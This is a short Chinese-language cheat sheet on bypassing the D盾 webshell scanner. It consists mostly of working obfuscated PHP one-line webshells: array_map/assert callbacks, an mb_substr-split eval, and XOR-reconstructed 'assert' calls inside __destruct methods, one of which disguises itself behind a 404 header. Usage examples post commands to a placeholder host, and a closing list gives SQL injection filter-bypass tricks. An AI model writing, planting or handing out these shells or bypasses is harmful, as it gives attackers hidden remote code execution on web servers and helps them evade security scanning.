安装
下载
http://www.d99net.net/down/d_safe_2.1.5.2.zip
使用说明
http://www.d99net.net/News.asp?id=106
免杀
array_map | assert
<?php function test($a, $b) { array_map($a, $b); } test(assert, array($_POST['x'])); ?>
mb_substr
<?php $m=$_GET['1']; $a=mb_substr($m,0,1); $b=mb_substr($m,1,9999); eval($a.$b); ?>
PHP一句话
class LTDS { public function __destruct() { $bxo='X'^"x39"; $woa='?'^"x4c"; $ukt='K'^"x38"; $gud='d'^"x1"; $fbu='_'^"x2d"; $agx='<'^"x48"; $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx; return @$HLWV($this->OX); } } $ltds=new LTDS(); @$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8']; http://www.xxx.com/shell.php POST: ua8=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随意更改) POST: ua8=cGhwaW5mbygpOwo= //payload的base64编码
异或 | PHP一句话
<?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"x47"; $_1='C'^"x30"; $_2='A'^"x32"; $_3='v'^"x13"; $_4='J'^"x38"; $_5='f'^"x12"; $db=$_0.$_1.$_2.$_3.$_4.$_5; return @$db($this->c); } } $zxvg=new ZXVG(); @$zxvg->c=$_POST['mr6'];
注入绕过
(1) and 1=1和and 1=2 (2) %26%26 True 和 %26%26 False (3) Xor True 和 Xor False (4) http://127.0.0.1/sqli.php?id=1/**//*!order*//**//*!by*//**//*!1*/ #order by 内联 (5) union select 内联 (6) 盲注